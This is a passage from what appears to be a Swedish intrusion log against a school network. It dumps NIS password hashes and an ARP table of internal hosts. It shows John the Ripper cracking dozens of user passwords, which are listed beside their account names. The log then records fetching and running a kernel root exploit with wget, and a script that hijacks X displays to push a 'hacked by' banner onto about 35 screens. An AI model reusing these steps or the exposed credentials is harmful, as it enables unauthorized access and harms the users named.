  1669. fs05ligo:LY/LgnVR6XCTw:12022:10000::/home/fs05ligo:/bin/sh
  1670. fs05migu:0QQLxE/B9rvJI:12023:10000::/home/fs05migu:/bin/sh
  1671. fs05tigu:38Mgx2Lr0aRC.:12024:10000::/home/fs05tigu:/bin/sh
  1672. fs05algu:EgcOIjKLNuflE:12025:10000::/home/fs05algu:/bin/sh
  1673. fs05emhe:wrE3Mgf.SzUwY:12026:10000::/home/fs05emhe:/bin/sh
  1674. fs05mahe:3zrEcKIB6.VME:12027:10000::/home/fs05mahe:/bin/sh
  1675. fs05pehi:ilm/mVG0Yew7M:12028:10000::/home/fs05pehi:/bin/sh
  1676. fs05erha:d137SdVXY2md6:12029:10000::/home/fs05erha:/bin/sh
  1677. fs05mais:54ROvd4Ta8F6s:12030:10000::/home/fs05mais:/bin/sh
  1678. fs05sajo:1GGYIwTApCy2M:12031:10000::/home/fs05sajo:/bin/sh
  1679. fs05pajo:5ZnBgHJSLg/ug:12032:10000::/home/fs05pajo:/bin/sh
  1680. fs05alka:/RLltgWItpwyg:12033:10000::/home/fs05alka:/bin/sh
  1681. fs05erka:fkDNx6nQXi7mo:12034:10000::/home/fs05erka:/bin/sh
  1682. fs05sika:tHDz.EuFloH3c:12035:10000::/home/fs05sika:/bin/sh
  1683. fs05ankj:K1EtFb1i039Jg:12036:10000::/home/fs05ankj:/bin/sh
  1684. fs05jola:MeDP8GWnJ/77M:12037:10000::/home/fs05jola:/bin/sh
  1685. fs05mali:xWVmbe7dTk.eM:12038:10000::/home/fs05mali:/bin/sh
  1686. fs05roli:YUPEHZwCEfXIg:12039:10000::/home/fs05roli:/bin/sh
  1687. fs05jili:5KTPllF7rHkRM:12040:10000::/home/fs05jili:/bin/sh
  1688. fs05kali:2hqkvCtkHRgOk:12041:10000::/home/fs05kali:/bin/sh
  1689. fs05olli:7otUdpQlpQHv6:12042:10000::/home/fs05olli:/bin/sh
  1690. fs05alli:JpAAEs/yagQcY:12043:10000::/home/fs05alli:/bin/sh
  1691. fs05mili:clM5DdpH.ZizY:12044:10000::/home/fs05mili:/bin/sh
  1692. fs05jomi:0HDUnnD.v0dU2:12045:10000::/home/fs05jomi:/bin/sh
  1693. fs05mimo:VoDqkIfv76ACs:12046:10000::/home/fs05mimo:/bin/sh
  1694. fs05camo:ICkstZx7jQOSg:12047:10000::/home/fs05camo:/bin/sh
  1695. fs05ermy:0vJ9rkOISTgYk:12048:10000::/home/fs05ermy:/bin/sh
  1696. fs05nimo:GsIr8xHM/vil6:12049:10000::/home/fs05nimo:/bin/sh
  1697. fs05saod:GOvWHhsJ7Ao0.:12050:10000::/home/fs05saod:/bin/sh
  1698. fs05anod:vA2Rk8.8M2yTM:12051:10000::/home/fs05anod:/bin/sh
  1699. fs05frol:KzNOzvsrd8tuE:12052:10000::/home/fs05frol:/bin/sh
  1700. fs05clre:YJCnRDvDKIEPw:12053:10000::/home/fs05clre:/bin/sh
  1701. fs05lara:74665mrZknc/k:12054:10000::/home/fs05lara:/bin/sh
  1702. fs05erro:yh5MHQ2YnHnS2:12055:10000::/home/fs05erro:/bin/sh
  1703. fs05elra:8T9e3EON6XUWA:12056:10000::/home/fs05elra:/bin/sh
  1704. fs05pasa:SQLwNnTMinwkw:12057:10000::/home/fs05pasa:/bin/sh
  1705. fs05emsa:s0u/Yq5w3ZRcs:12058:10000::/home/fs05emsa:/bin/sh
  1706. fs05ossa:0UToZjaworaXY:12059:10000::/home/fs05ossa:/bin/sh
  1707. fs05anso:08kZCNmpgaeI.:12060:10000::/home/fs05anso:/bin/sh
  1708. fs05tosu:94IDgyD0FXh1Y:12061:10000::/home/fs05tosu:/bin/sh
  1709. fs05masv:6J3Ym.F5ru0hA:12062:10000::/home/fs05masv:/bin/sh
  1710. fs05emsv:oj6456lGU6Daw:12063:10000::/home/fs05emsv:/bin/sh
  1711. fs05kasv:n9VRBXGeJ7frg:12064:10000::/home/fs05kasv:/bin/sh
  1712. fs05visa:42q9RTyCuhL5s:12065:10000::/home/fs05visa:/bin/sh
  1713. fs05erti:WHou.LQIubJCY:12066:10000::/home/fs05erti:/bin/sh
  1714. fs05toto:qymJF0/xnkdGc:12067:10000::/home/fs05toto:/bin/sh
  1715. fs05frwa:yvlr9G646BB8A:12068:10000::/home/fs05frwa:/bin/sh
  1716. fs05mawe:qTfHB14ltP08Y:12069:10000::/home/fs05mawe:/bin/sh
  1717. fs05sevi:RPkccMKyCvP1o:12070:10000::/home/fs05sevi:/bin/sh
  1718. fs05anwi:Hi5ab2DhQyUeo:12071:10000::/home/fs05anwi:/bin/sh
  1719. fs05jewa:qfaQGi8KjoIx6:12072:10000::/home/fs05jewa:/bin/sh
  1720. fs05daag:kxKkjomfjimfA:12073:10000::/home/fs05daag:/bin/sh
  1721. fs05joak:CV25rCDbJ8OAY:12074:10000::/home/fs05joak:/bin/sh
  1722. fs05amer:e95xSmhJBpLvs:12076:10000::/home/fs05amer:/bin/sh
  1723. fs02joli:ADNHKY/0qX02E:13035:10000::/home/fs02joli:/bin/sh
  1724. fs02roka:HM2t5Qk7tRofY:13061:10000::/home/fs02roka:/bin/sh
  1725. fs02saon:qbdbBi8zoKn/s:13066:10000::/home/fs02saon:/bin/sh
  1726. fs02tofe:mAmp18d2lGQgY:13070:10000::/home/fs02tofe:/bin/sh
  1727. fs03mabj:ySlQwym7iidY2:13100:10000::/home/fs03mabj:/bin/sh
  1728. fs03emah:58QTsy3UUp6dY:15000:10000::/home/fs03emah:/bin/sh
  1729. fs03fran:E4p9BnxZ2XeM6:15001:10000::/home/fs03fran:/bin/sh
  1730. fs03elbj:/kJjUbZYfsIMc:15002:10000::/home/fs03elbj:/bin/sh
  1731. fs03bjer:ekGP58CI0fEX6:15003:10000::/home/fs03bjer:/bin/sh
  1732. fs03jofl:Ko5GjlvAXSEFg:15004:10000::/home/fs03jofl:/bin/bash
  1733. fs03laga:NT/ReFJ4QeKY2:15005:10000::/home/fs03laga:/bin/sh
  1734. fs03jeha:mSYstJBvrgiY.:15006:10000::/home/fs03jeha:/bin/sh
  1735. fs03maha:eCzdaTumNTlIk:15007:10000::/home/fs03maha:/bin/sh
  1736. fs03uljo:48Dtn8zUKrcF.:15009:10000::/home/fs03uljo:/bin/sh
  1737. fs03milu:HabcM.piN1bfo:15010:10000::/home/fs03milu:/bin/sh
  1738. fs03anmo:p3V3xhJa.in1c:15012:10000::/home/fs03anmo:/bin/sh
  1739. fs03sani:6fqgxrsYezSqQ:15013:10000::/home/fs03sani:/bin/sh
  1740. fs03mano:Scd46fFI/Lw0k:15014:10000::/home/fs03mano:/bin/sh
  1741. fs03emol:yRpkIgP3bR1L.:15015:10000::/home/fs03emol:/bin/sh
  1742. fs03hepe:7aajkMyW7djqM:15016:10000::/home/fs03hepe:/bin/sh
  1743. fs03mape:uBAQ7X3191Ep.:15017:10000::/home/fs03mape:/bin/sh
  1744. fs03vipo:CsB.JgXleI/cY:15018:10000::/home/fs03vipo:/bin/sh
  1745. fs03jose:BmbhGTXsDrO.6:15021:10000::/home/fs03jose:/bin/sh
  1746. fs03lisu:AMTlpCV4zIgyU:15022:10000::/home/fs03lisu:/bin/sh
  1747. fs03alsv:veYaYPbjhdN02:15023:10000::/home/fs03alsv:/bin/sh
  1748. fs03hevi:tub8gDns0ZhNI:15024:10000::/home/fs03hevi:/bin/sh
  1749. fs03pewa:UF3fs0MeV8ivA:15025:10000::/home/fs03pewa:/bin/sh
  1750. fs03gaak:tRZBgPoHzf.P2:15026:10000::/home/fs03gaak:/bin/sh
  1751. fs03robe:V97ZZ7HF3zpgY:15027:10000::/home/fs03robe:/bin/sh
  1752. fs03alci:iL5L9tFStkIMo:15028:10000::/home/fs03alci:/bin/sh
  1753. fs03emer:ptOy26SsEBpxI:15029:10000::/home/fs03emer:/bin/sh
  1754. fs03mafo:P47ZTRWThrkpU:15031:10000::/home/fs03mafo:/bin/sh
  1755. fs03mafr:sSmOBIYrut7Dg:15032:10000::/home/fs03mafr:/bin/sh
  1756. fs03ango:f0nhjy.3zC52I:15033:10000::/home/fs03ango:/bin/sh
  1757. fs03johe:5d6v6vFrOL7WU:15034:10000::/home/fs03johe:/bin/sh
  1758. fs03daho:a64D7eGMi0Hx2:15035:10000::/home/fs03daho:/bin/sh
  1759. fs03soha:CF8V6zAqp2lXo:15036:10000::/home/fs03soha:/bin/sh
  1760. fs03anho:YbvTsnEFSnH2k:15037:10000::/home/fs03anho:/bin/sh
  1761. fs03mino:K3VUq9si5NLhk:15039:10000::/home/fs03mino:/bin/sh
  1762. fs03olpe:4OlnvwEIec/QA:15040:10000::/home/fs03olpe:/bin/sh
  1763. fs03mira:HELApef0FBCN6:15041:10000::/home/fs03mira:/bin/sh
  1764. fs03guro:glzzUau/cMnE2:15042:10000::/home/fs03guro:/bin/sh
  1765. fs03olsa:w29Ck1eaXEF/Q:15043:10000::/home/fs03olsa:/bin/sh
  1766. fs03rosa:58JQlkAYDfWAs:15044:10000::/home/fs03rosa:/bin/sh
  1767. fs03ansj:lVy.G7o9UVD7g:15045:10000::/home/fs03ansj:/bin/sh
  1768. fs03rosj:6H3MqprgDjtIM:15046:10000::/home/fs03rosj:/bin/sh
  1769. fs03mave:7MQlGk2UqwlR6:15047:10000::/home/fs03mave:/bin/sh
  1770. fs03mawa:LfPoVYeX2aXMY:15048:10000::/home/fs03mawa:/bin/sh
  1771. fs03chwa:.Ve3HiIt9GtUI:15049:10000::/home/fs03chwa:/bin/sh
  1772. fs03jows:gipsBB4qNth1w:15051:10000::/home/fs03jows:/bin/sh
  1773. fs03frwi:N3Wj2F0Y3zKZQ:15052:10000::/home/fs03frwi:/bin/sh
  1774. fs03cesa:lN4YGBgazhnUQ:15054:10000::/home/fs03cesa:/bin/sh
  1775. fs03peah:YqRTN7SdTb0so:15055:10000::/home/fs03peah:/bin/sh
  1776. fs03vias:aiHfFUgDPs7fE:15080:10000::/home/fs03vias:/bin/sh
  1777. fs03yakh:dr5Md2USZQXik:15081:10000::/home/fs03yakh:/bin/sh
  1778. fs03rafo:zTtOfZtzvExZ2:15098:10000::/home/fs03rafo:/bin/sh
  1779. fs03kini:NMykKjwXVnWhE:15099:10000::/home/fs03kini:/bin/sh
  1780. fs03omaz:ocj0o9EUqJzSI:15500:10000::/home/fs03omaz:/bin/sh
  1781. fs04than:JpgyE8KatSlfw:16001:10000::/home/fs04than:/bin/sh
  1782. fs04osbl:SbDdEg2OyXhHQ:16002:10000::/home/fs04osbl:/bin/sh
  1783. fs04dace:Iku8zbYgQ1qAU:16003:10000::/home/fs04dace:/bin/sh
  1784. fs04emek:TUWpAzlBstwio:16004:10000::/home/fs04emek:/bin/sh
  1785. fs04jofa:RSvjVsRXzV9GA:16005:10000::/home/fs04jofa:/bin/sh
  1786. fs04boge:UQ1EmiLJT4eS.:16006:10000::/home/fs04boge:/bin/sh
  1787. fs04pegr:efMQ6yTKmBhis:16007:10000::/home/fs04pegr:/bin/sh
  1788. fs04sugu:l69IATli79j6.:16008:10000::/home/fs04sugu:/bin/sh
  1789. fs04magu:7oU9dlhMXm.kA:16009:10000::/home/fs04magu:/bin/sh
  1790. fs04huhe:YJF4Nn10VYI/A:16010:10000::/home/fs04huhe:/bin/sh
  1791. fs04chja:3SvFfgDvWuOD6:16011:10000::/home/fs04chja:/bin/sh
  1792. fs04otke:5yGipBP021Fbo:16013:10000::/home/fs04otke:/bin/sh
  1793. fs04vila:ZYUKVVwa.gF96:16015:10000::/home/fs04vila:/bin/sh
  1794. fs04hemo:ygo9qRFsV48eM:16016:10000::/home/fs04hemo:/bin/sh
  1795. fs04jeol:baJyGvzMWSid.:16018:10000::/home/fs04jeol:/bin/sh
  1796. fs04dape:7Y29LO12VeXHI:16020:10000::/home/fs04dape:/bin/sh
  1797. fs04elre:KWKlFdLClccTE:16022:10000::/home/fs04elre:/bin/sh
  1798. fs04sasj:ABCD!efgh12345$67890:16024:10000::/home/fs04sasj:/bin/sh
  1799. fs04cosj:KLzX3tEnbx99g:16025:10000::/home/fs04cosj:/bin/sh
  1800. fs04hasu:2cdrQ.03IMwtc:16026:10000::/home/fs04hasu:/bin/sh
  1801. fs04josv:tFSWH19WF0Acc:16027:10000::/home/fs04josv:/bin/sh
  1802. fs04peto:tNGHODu6S1yg2:16028:10000::/home/fs04peto:/bin/sh
  1803. fs04heve:TrbynYl/MHVzc:16029:10000::/home/fs04heve:/bin/sh
  1804. fs04liwe:awL61r4XM62aM:16030:10000::/home/fs04liwe:/bin/sh
  1805. fs04habe:kDd7D9lg8ElG.:16050:10000::/home/fs04habe:/bin/sh
  1806. fs04pebl:YfV4Qvypim1FA:16051:10000::/home/fs04pebl:/bin/zsh
  1807. fs04peba:lVIHWIIDyt2b2:16052:10000::/home/fs04peba:/bin/sh
  1808. fs04vida:YY26/gmy6XIOU:16053:10000::/home/fs04vida:/bin/sh
  1809. fs04olde:RkJ93H.SEevg6:16054:10000::/home/fs04olde:/bin/sh
  1810. fs04joel:6dAgw.ZRByB3o:16055:10000::/home/fs04joel:/bin/sh
  1811. fs04jegi:IwerUMu3qV9g6:16056:10000::/home/fs04jegi:/bin/sh
  1812. fs04rogu:XUREZOEX8wQWA:16057:10000::/home/fs04rogu:/bin/sh
  1813. fs04angu:lQONx9vimST4M:16058:10000::/home/fs04angu:/bin/sh
  1814. fs04mahe:Fhewc/KpCRayc:16059:10000::/home/fs04mahe:/bin/sh
  1815. fs04dejo:crVAEjBkZOknM:16061:10000::/home/fs04dejo:/bin/sh
  1816. fs04jijo:3zFI2eMhroKe.:16062:10000::/home/fs04jijo:/bin/sh
  1817. fs04elka:Y5B1UdBFb7TEs:16063:10000::/home/fs04elka:/bin/sh
  1818. fs04joka:RZU7.CcUDVgRQ:16064:10000::/home/fs04joka:/bin/sh
  1819. fs04adla:0MgQiowFY0OII:16065:10000::/home/fs04adla:/bin/sh
  1820. fs04frli:4lj4mTqZbC2/6:16066:10000::/home/fs04frli:/bin/sh
  1821. fs04saol:Rjl/zVpWC.V4U:16069:10000::/home/fs04saol:/bin/sh
  1822. fs04tape:vGMz4YKeREH6s:16070:10000::/home/fs04tape:/bin/sh
  1823. fs04lipe:yZOsPGz12ZKmw:16071:10000::/home/fs04lipe:/bin/sh
  1824. fs04osro:4mzsyTg4CcqLo:16072:10000::/home/fs04osro:/bin/sh
  1825. fs04peru:sY7QpPNXwoHx6:16073:10000::/home/fs04peru:/bin/sh
  1826. fs04lisa:qgymsnsafhzOs:16074:10000::/home/fs04lisa:/bin/sh
  1827. fs04mosh:8oPS.y3zRO2Qg:16075:10000::/home/fs04mosh:/bin/sh
  1828. fs04odsv:Rx/uJjuMZLT9c:16076:10000::/home/fs04odsv:/bin/sh
  1829. fs04anul:ILeCB95NNauJ2:16078:10000::/home/fs04anul:/bin/sh
  1830. fs04jevi:/Nb0JzShxpZtI:16079:10000::/home/fs04jevi:/bin/sh
  1831. fs04erwi:wPBgVgk60rfX6:16080:10000::/home/fs04erwi:/bin/sh
  1832. fs04mazo:lS2SXNbrNdvE6:16081:10000::/home/fs04mazo:/bin/sh
  1833. sal1:2kAap3SjhrsFo:20000:10000::/home/sal1:/bin/sh
  1834. sal3:LmFN7eaIhK/uI:20001:10000::/home/sal3:/bin/sh
  1835. sal6:I8Uur3Uo7mBCA:20002:10000::/home/sal6:/bin/sh
  1836. sal7:0faQnK0rnO/Yc:20003:10000::/home/sal7:/bin/sh
  1837. fs03kaak:84QQZIBbQOZPM:65504:10000::/home/fs03kaak:/bin/sh
  1838. kristoffer:KkbGlhCL2XgfM:65507:12000::/home/kristoffer:/bin/sh
  1839. lnb:hH6XL2LZl4jSM:65508:12000::/home/lnb:/bin/sh
  1840.  
  1841.  
  1842.  
  1843. ch-v1-01 (192.168.1.150) at 00:30:05:0F:19:35 [ether] on eth0
  1844. ch-v1-02 (192.168.1.151) at 00:30:05:0F:18:90 [ether] on eth0
  1845. sk-uph-1 (192.168.1.180) at 00:30:05:0F:18:82 [ether] on eth0
  1846. ch-v2-16 (192.168.1.144) at 00:30:05:20:E2:3B [ether] on eth0
  1847. ch-v2-17 (192.168.1.145) at 00:30:05:20:E1:15 [ether] on eth0
  1848. sk-uph-2 (192.168.1.181) at 00:30:05:20:E1:2C [ether] on eth0
  1849. sk-uph-3 (192.168.1.182) at 00:30:05:20:E2:3D [ether] on eth0
  1850. ch-v2-18 (192.168.1.146) at 00:30:05:20:A1:76 [ether] on eth0
  1851. lina.forsmark.uu.se (192.168.1.1) at 00:A0:24:F2:5A:5B [ether] on eth0
  1852. sk-uph-4 (192.168.1.183) at 00:30:05:0F:18:86 [ether] on eth0
  1853. ch-v1-08 (192.168.1.157) at 00:30:05:0F:19:59 [ether] on eth0
  1854. sk-uph-6 (192.168.1.185) at 00:30:05:20:A4:3C [ether] on eth0
  1855. sk-uph-5 (192.168.1.184) at 00:30:05:20:A1:75 [ether] on eth0
  1856. munin.forsmark.uu.se (192.168.1.10) at 08:00:06:2B:31:44 [ether] on eth0
  1857. ch-v1-06 (192.168.1.155) at 00:30:05:20:E2:0E [ether] on eth0
  1858. sk-sal3 (192.168.1.191) at 00:30:05:20:A4:79 [ether] on eth0
  1859. ch-v1-05 (192.168.1.154) at 00:30:05:0F:18:54 [ether] on eth0
  1860. oden (192.168.1.20) at 00:E0:81:51:14:BC [ether] on eth0
  1861. ch-v2-06 (192.168.1.134) at 00:30:05:20:E2:37 [ether] on eth0
  1862. ch-v2-04 (192.168.1.132) at 00:30:05:20:A1:74 [ether] on eth0
  1863. ch-v2-05 (192.168.1.133) at 00:30:05:20:E2:1E [ether] on eth0
  1864. ch-v2-02 (192.168.1.130) at 00:30:05:20:E2:02 [ether] on eth0
  1865. ch-v2-03 (192.168.1.131) at 00:30:05:0F:19:37 [ether] on eth0
  1866. fja (192.168.1.128) at 00:30:05:0F:18:B8 [ether] on eth0
  1867. lars (192.168.1.201) at 00:30:05:20:A3:16 [ether] on eth0
  1868. ch-v2-01 (192.168.1.129) at 00:30:05:20:E1:2B [ether] on eth0
  1869. christer (192.168.1.171) at 00:30:05:0F:19:45 [ether] on eth0
  1870. ch-v2-15 (192.168.1.143) at 00:30:05:0F:14:01 [ether] on eth0
  1871. carlos (192.168.1.170) at 00:30:05:20:E2:05 [ether] on eth0
  1872. ch-v2-12 (192.168.1.140) at 00:30:05:0F:19:36 [ether] on eth0
  1873. ? (192.168.1.197) at 00:30:05:20:A1:62 [ether] on eth0
  1874. petter (192.168.1.175) at 00:30:05:20:A4:67 [ether] on eth0
  1875. ch-v2-11 (192.168.1.139) at 00:30:05:0F:19:5E [ether] on eth0
  1876. madis (192.168.1.174) at 00:30:05:0F:19:66 [ether] on eth0
  1877. ch-v2-10 (192.168.1.138) at 00:30:05:20:A1:79 [ether] on eth0
  1878. olle (192.168.1.173) at 00:30:05:20:A6:79 [ether] on eth0
  1879. ch-v2-09 (192.168.1.137) at 00:30:05:0F:14:03 [ether] on eth0
  1880. sk-sal6 (192.168.1.192) at 00:30:05:20:E2:0A [ether] on eth0
  1881. britt (192.168.1.172) at 00:30:05:20:A3:10 [ether] on eth0
  1882. ch-v2-08 (192.168.1.136) at 00:30:05:20:E2:2B [ether] on eth0
  1883. ch-v2-08 (192.168.1.136) at 00:30:05:20:E2:2B [ether] on eth0
  1884.  
  1885.  
  1886. ypcat -x
  1887. Use "ethers" for map "ethers.byname"
  1888. Use "aliases" for map "mail.aliases"
  1889. Use "services" for map "services.byname"
  1890. Use "protocols" for map "protocols.bynumber"
  1891. Use "hosts" for map "hosts.byname"
  1892. Use "networks" for map "networks.byaddr"
  1893. Use "group" for map "group.byname"
  1894. Use "passwd" for map "passwd.byname"
  1895.  
  1896. root:(/tmp/john/john-1.6/run) ./john -wordfile:../../all apa.txt
  1897. Loaded 204 passwords with 198 different salts (Standard DES [24/32 4K])
  1898. internet (fs03ansj)
  1899. daniel (fs04dape)
  1900. louise (fs05lobe)
  1901. cocacola (fs05lara)
  1902. jesus1 (fs05frar)
  1903. asdfjkl (fs04peto)
  1904. mars (fs03maha)
  1905. shit (fs03gaak)
  1906. unknown (fs05erti)
  1907. afghan (fs05anek)
  1908. anthem (fs05jomi)
  1909. catharsi (fs05sice)
  1910. citizen (fs05nimo)
  1911. mice (britt)
  1912. nazareth (fs03mave)
  1913. trunks (fs05chba)
  1914. apa (fs03pewa)
  1915. basos (fs04olde)
  1916. hamilton (fs04lipe)
  1917. palla (fs04odsv)
  1918. passions (fs04dejo)
  1919. roaming (fs04dace)
  1920. saft (fs03olsa)
  1921. simson (fs05phfr)
  1922. elektron (fs03soha)
  1923. ingentin (fs04saol)
  1924. kuk (fs04huhe)
  1925. snorre (fs04osbl)
  1926. reklam (fs04hemo)
  1927. danilo (fs03anho)
  1928. forsmark (sal7)
  1929. forsmark (fs03sani)
  1930. forsmark (sal6)
  1931. forsmark (sal1)
  1932. forsmark (sal3)
  1933. skratt (fs05algu)
  1934. uppsala (kristoffer)
  1935. himura (fs03omaz)
  1936. kaktusen (fs05daag)
  1937. spermier (fs02saon)
  1938. adde (fs04than)
  1939. narnia (fs05sajo)
  1940. noline (fs03frwi)
  1941. rotflmao (fs05visa)
  1942. sandvike (fs03emah)
  1943. simcity (fs05tosu)
  1944. tradgard (fs05guca)
  1945.  
  1946.  
  1947. fs03sani@oden ~ $ smbclient //10.0.0.27/lagring
  1948. Password:
  1949. Domain=[FBIN] OS=[Unix] Server=[Samba 3.0.14a-Debian]
  1950. smb: \> ls
  1951. . D 0 Tue Aug 30 17:22:45 2005
  1952. .. D 0 Tue Aug 30 17:22:37 2005
  1953. film D 0 Wed Sep 7 13:54:10 2005
  1954. spel D 0 Wed Mar 9 16:38:48 2005
  1955. musik D 0 Tue Feb 8 18:31:56 2005
  1956. torrent-incoming D 0 Mon Sep 26 19:36:24 2005
  1957. inkommande D 0 Thu Sep 22 22:20:59 2005
  1958. program D 0 Fri Sep 16 00:04:06 2005
  1959.  
  1960. 33835 blocks of size 2097152. 3459 blocks available
  1961. smb: \>
  1962.  
  1963.  
  1964.  
  1965. #
  1966. # oden verkar vara huvudservern
  1967. #
  1968.  
  1969. fs03sani@oden ~ $ w
  1970. 15:33:13 up 48 days, 1:02, 122 users, load average: 0.03, 0.02, 0.08
  1971.  
  1972. #
  1973. # mecka root p� oden
  1974. #
  1975.  
  1976. fs03sani@oden ~ $ cd /tmp
  1977. fs03sani@oden ~ $ wget http://******.**/krad
  1978. fs03sani@oden ~ $ chmod +x krad
  1979. fs03sani@oden ~ $ ./krad
  1980. [ k-rad.c - linux 2.6.* CPL 0 kernel exploit ]
  1981. [ Discovered Jan 2005 by sd <[email protected]> ]
  1982. [-] y3r 422 12 n07 3r337 3nuPh!
  1983. [*] Try increase nrpages?
  1984. fs03sani@oden ~ $ ./krad 3
  1985. {*] You got root
  1986.  
  1987. oden ~ # id
  1988. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
  1989.  
  1990. oden ~ # rm -rf krad
  1991.  
  1992. oden ~ # uptime;users;uname -a
  1993. 00:47:10 up 48 days, 10:16, 122 users, load average: 0.08, 0.09, 0.03
  1994. britt carlos carlos fja fs04frli fs04hemo fs04hemo fs04hemo fs04jeol
  1995. fs04jeol fs04lipe fs04mosh fs04odsv fs04otke fs04rogu fs04rogu fs04rogu
  1996. fs04rogu fs04rogu fs04rogu fs04rogu fs04rogu fs04than fs04than fs04than
  1997. fs04than fs04vida fs04vida fs04vida fs05alka fs05alka fs05anek fs05anek
  1998. fs05anek fs05anek fs05anek fs05anek fs05ankj fs05anod fs05anod fs05anwa
  1999. fs05anwa fs05chba fs05chba fs05chba fs05chba fs05chba fs05chba fs05clre
  2000. fs05daag fs05daer fs05emhe fs05emhe fs05emsa fs05emsa fs05emsa fs05emsa
  2001. fs05emsa fs05emsa fs05emsa fs05emsv fs05erha fs05erka fs05erka fs05frar
  2002. fs05gued fs05gued fs05gued fs05jian fs05jian fs05jobe fs05jobe fs05jobj
  2003. fs05jobj fs05jola fs05kasv fs05kasv fs05ligo fs05ligo fs05ligo fs05ligo
  2004. fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo fs05mahe
  2005. fs05mahe fs05mahe fs05mahe fs05mahe fs05mais fs05mimo fs05mimo fs05mimo
  2006. fs05mimo fs05nimo fs05nimo fs05nimo fs05olli fs05pehi fs05pehi fs05pehi
  2007. fs05pehi fs05pehi fs05pehi fs05phfr fs05phfr fs05roli fs05roli fs05saan
  2008. fs05sajo fs05saod fs05saod fs05saod fs05saod fs05sice fs05sika fs05soas
  2009. fs05toto
  2010. Linux oden 2.6.4-gentoo #1 SMP Sat Apr 3 18:44:37 CEST 2004 i686 Intel(R)
  2011. Xeon(TM) CPU 2.40GHz GenuineIntel GNU/Linux
  2012.  
  2013. #
  2014. # F�r att l�gga till alla datorers sk�rmar som inte redan �r tilllagda skriver vi ett script
  2015. # som g�r det �t oss eftersom det �r ganska m�nga vill man inte l�gga till var f�r sig manuellt.
  2016. #
  2017. # H�r �r koden vi skrev ihop lite snabbt
  2018. #
  2019.  
  2020. oden ~ # cat send.sh
  2021. ls |grep 192.168.1|grep ":0"|grep "Xauth"|sed 's/:/ /g'|awk '{print "ping -c 1 -w 1 "$1" &"}'|sh 2>&1|grep "64 bytes from"|sed 's/:/ /g'|awk '{print $4}' > temp
  2022. cat temp |grep -v "192.168.1.154"|awk '{print "export DISPLAY="$1":0; export XAUTHORITY="$1":0.Xauth ; xhost +oden"}'|sh 2>/dev/null|wc -l |awk '{print "L�gger +oden p�: "$1 "burkar"}'
  2023. cat temp| awk '{print "export DISPLAY="$1":0.0 ;xmessage -file mesg -center -button \"\" &"}'|sh 2>/dev/null|echo -n .
  2024. echo "Klar ffs"
  2025. rm temp
  2026. oden ~ # cat mesg # meddelandet som kommer dyka upp p� alla sk�rmar
  2027. ___ | ___ |"|
  2028. .|||. |.===. ,,,,, /\#/\ _|_|_
  2029. (o o) {}o o{} /(o o)\ /(o o)\ (o o)
  2030. ooO--(_)--Ooo-ooO--(_)--Ooo-ooO--(_)--Ooo-ooO--(_)--Ooo-ooO--(_)--Ooo-
  2031. _ _ _ _
  2032. | | | | | | | |
  2033. | |__ __ _ ___| | _____ __| | | |__ _ _
  2034. | '_ \ / _` |/ __| |/ / _ \/ _` | | '_ \| | | |
  2035. | | | | (_| | (__| < __/ (_| | | |_) | |_| |
  2036. |_| |_|\__,_|\___|_|\_\___|\__,_| |_.__/ \__, |
  2037. __/ |
  2038. |___/
  2039.  
  2040. _ _ _ _____
  2041. | | | | | | / ____|
  2042. | | _____| |__ __ _| |__ | | _ __ _____ __
  2043. | |/ / _ \ '_ \ / _` | '_ \| | | '__/ _ \ \ /\ / /
  2044. | < __/ |_) | (_| | |_) | |____| | | __/\ V V /
  2045. |_|\_\___|_.__/ \__,_|_.__/ \_____|_| \___| \_/\_/
  2046.  
  2047. - HACK THE PLANET, FREE KEBAB
  2048.  
  2049. #
  2050. # Tidigt en l�rdagsmorgon (kl:0900 mer exakt) ringer v�r v�ckarklocka
  2051. # Vi ska nu k�ra scriptet vi skrivit f�r att skicka ut meddelanden
  2052. # P� alla fula burkar i n�tverket. Vi ser att det �r mycket folk p� deras webkamera
  2053. # Ett perfekt tillf�lle.
  2054. #
  2055.  
  2056. oden ~ # ./send.sh
  2057. L�gger +oden p�: 35burkar
  2058. .Klar ffs
  2059.  
  2060. #
  2061. # Folk b�rjar peka p� sk�rmarna och dyl. Lite roligt
  2062. # Lite senare p� irc
  2063. #
  2064.  
  2065. 09:20 <@Robin> hett tips nu n�r folk verkar ha kommit p� att man kan exporta
  2066. display: xhost -
  2067. 09:21 < Baeaeken> Robin: ...
  2068.  
  2069.  
  2070. 23:29 < jackie> M�ste man inte vara root f�r det?
  2071. 23:29 <@Robin> nepp
  2072. 23:29 <@Robin> folk hade kul med export display + bjering.jpg f�rra �ret
  2073. 23:30 < jackie> vad e bjering.jpg, kan du visa?
  2074. 23:31 <@Robin> helst inte :>
  2075. 23:31 < jackie> �h kom igen ;)
  2076. 23:31 < Karro> Haha tror jag vet ;p
  2077. 23:31 < jackie> sl�ng upp den p� n�gon webserver o slanga url
  2078. 23:31 <@Robin> det �r en bild p� en naken bjering
  2079. 23:31 < Karro> Som jag trodde ;p
  2080. 23:31 <@Robin> grmyt poppis att exportera till andras terminaler
  2081. 23:32 < jackie> jag s�g n�got hacked by typ p� �ppet hus
  2082. 23:32 < jackie> p� alla sk�rmar, vad var det?
  2083. 23:32 <@Robin> det var n�gon som var omogen helt enkelt.
  2084. 23:33 < jackie> aha!, men f�r att g�ra s� beh�vs det ju root?
  2085. 23:33 <@Robin> typ.
  2086. 23:36 < jackie> s� n�gon hade root allts� ?
  2087. 23:37 <@Robin> jag har inte kollat s� mycket p� vad som h�nde, fja har lite
  2088. st�rre koll p� det... men ja det verkar som det
  2089. 23:37 < jackie> ok �r inte ni duktiga p� s�kerhet och s�dant?
  2090. 23:39 <@Robin> finns alltid n�gon l�cka
  2091. 23:40 <@Robin> men det k�nns ganska meningsl�st att hacka oden... vad ska
  2092. man vinna p� det liksom?
  2093.  
  2094.  
  2095. #
  2096. # Samtidigt i v�r terminal
  2097. #
  2098.  
  2099. oden ~ # uname -a;uptime;users Linux oden 2.6.4-gentoo #1 SMP Sat Apr 3 18:44:37 CEST 2004 i686 Intel(R) Xeon(TM) CPU 2.40GHz GenuineIntel GNU/Linux 09:52:16 up 52 days, 19:21, 117 users, load average: 1.00, 1.12, 1.38 britt carlos carlos fja fja fja fs04hemo fs04hemo fs04hemo fs04jeol
  2100. fs04jeol fs04lipe fs04odsv fs04otke fs04rogu fs04rogu fs04rogu fs04rogu
